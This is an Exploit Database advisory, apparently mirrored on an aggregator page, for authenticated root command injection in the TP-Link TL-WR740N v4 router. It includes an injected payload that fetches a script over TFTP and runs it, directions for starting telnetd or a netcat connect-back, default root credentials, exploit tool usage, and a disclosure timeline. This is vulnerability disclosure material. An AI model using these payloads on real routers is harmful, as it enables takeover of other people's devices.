TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) – Command Execution

• Exploit Database
• 26 阅读

• 作者： Christoph Kuhl
  日期： 2014-08-03
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34254/

• # Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) arbitrary shell command execution
  # Date: 08/03/2014
  # Exploit Author: Christoph Kuhl
  # Vendor Homepage: http://www.tp-link.com
  # Software Link:http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
  # Version: FW-Ver. 3.16.6 Build 130529 Rel.47286n
  # Tested on: TP-Link TL-WR740N v4
  
  Exploit:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34254.7z (Password: TP-P0wned-Link)
  
  Vulnerability description:
  The domain name parameters of the "Parental Control" and "Access 
  Control" features of the TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build 
  130529 Rel.47286n) router are prone to arbitrary shell command execution 
  as root for users who are authenticated against the web interface.
  Each shell payload is restricted up to 28 bytes. The "Parental Control" 
  feature allows you to specify 8 domains (= 8 commands) so you have 8 x 
  28 = 244 bytes of shell commands. This is sufficient to post-load and 
  execute a shell script of arbitrary length from a tftp server.
  Employing this method one can gain full control over the device when 
  post-loading a mightier busybox MIPS binary and executing telnetd or 
  using netcat to connect back. Default login credentials are known to be 
  root:5up, Admin:5up or ap71:.
  
  Technical Cause:
  The web interface and the whole routing logic on the device is 
  controlled by a single homebrew process (httpd) running as root.
  This binary is employing various fopen() and system() calls in order to 
  configure the device.
  One of these calls refers to a script (/tmp/wr841n/parent.sh) being 
  filled with user input data from the "Parental Control" mask.
  
  ...
  iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 
  00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls USER INPUT 
  HERE,return1 -j RETURN
  iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 
  00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ANOTHER USER 
  INPUT HERE,return1 -j RETURN
  ...
  
  The input data is only poorly checked by some JavaScript functions but 
  the server accepts most characters. Entering a shell command surrounded 
  by ';' will result in code execution:
  
  ...
  iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 
  00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ;tftp -gr a 
  192.168.0.1;,;sh a;,return1 -j RETURN
  ...
  
  The same goes for the Access Control Feature. The only difference is 
  that the script name is /tmp/wr841n/accessCtrl.sh.
  The attack is persistent until resetting the parental control or access 
  control settings. After rebooting the device will execute the commands 
  again.
  This vulnerability may or may not affect other TP-Link hardware and 
  software versions. However it was only tested against TP-Link TL-WR740N 
  v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) within the local network.
  
  
  Exploit POC code description:
  The exploit tries to load and execute a shell script called 'a' (for 
  attack) from the specified tftpd server. This is for the circumventing 
  the length restriction of 28 bytes and the fact that the preloaded 
  busybox binary is a bit restricted (no netcat and telnetd available).
  The 'a' script then loads a mightier busybox (filename busyboxx) binary 
  from the tftp server specified in that 'a' script (default 192.168.0.1). 
  It also sets up a more comfortable environment and starts telnetd as 
  well as a ftp server.
  You can then connect to the router via telnet and ftp.
  The exploit code is written in C# (.NET 4.5) so you need .NET Framework 
  4.5 to execute it.
  
  Usage:
  ParentalControlExploit.exe [/a | /p] [RouterIp] [RouterWebIfaceUsername] 
  [RouterWebIfacePassword] [TFTPServerIp]
  
  TP-Link TL-WR740N v4 parental control and access control exploit. 2014 
  by C. Kuhl.
  
  
  Options:
  /aUse Access Control Exploit
  /pUse Parental Control Exploit
  [RouterIp]IP of the target to attack (default 192.168.0.1)
  [Username]Username of the Webinterface Login (default admin)
  [Password]Username of the Webinterface Login (default admin)
  [TFTPServer]TFTP Host where the 'a' shell file is hosted for execution
  
  Example: ParentalControlExploit.exe /a 192.168.0.1 admin admin 192.168.0.100
  
  
  History of the flaw:
  07/01/2014-Found it
  07/05/2014-Notified TP Link via their Online Support Contact 
  form including detailed description and link to POC exploit
  07/14/2014-Got answer via mail that they could not reproduce the 
  flaw via the router's web interface and asked for more information.
  07/26/2014-Replied to TP-Link that one cannot reproduce the bug 
  via the router's web interface due to the javascript "check logic" and 
  that they need to either employ direct GET requests or use the provided 
  exploit
  07/29/2014-TP Link states that this was no security flaw because 
  the attacker had to know the credientials to the webinterface. It was 
  like giving the key to your flat to a housebreaker.
  08/03/2014-Publication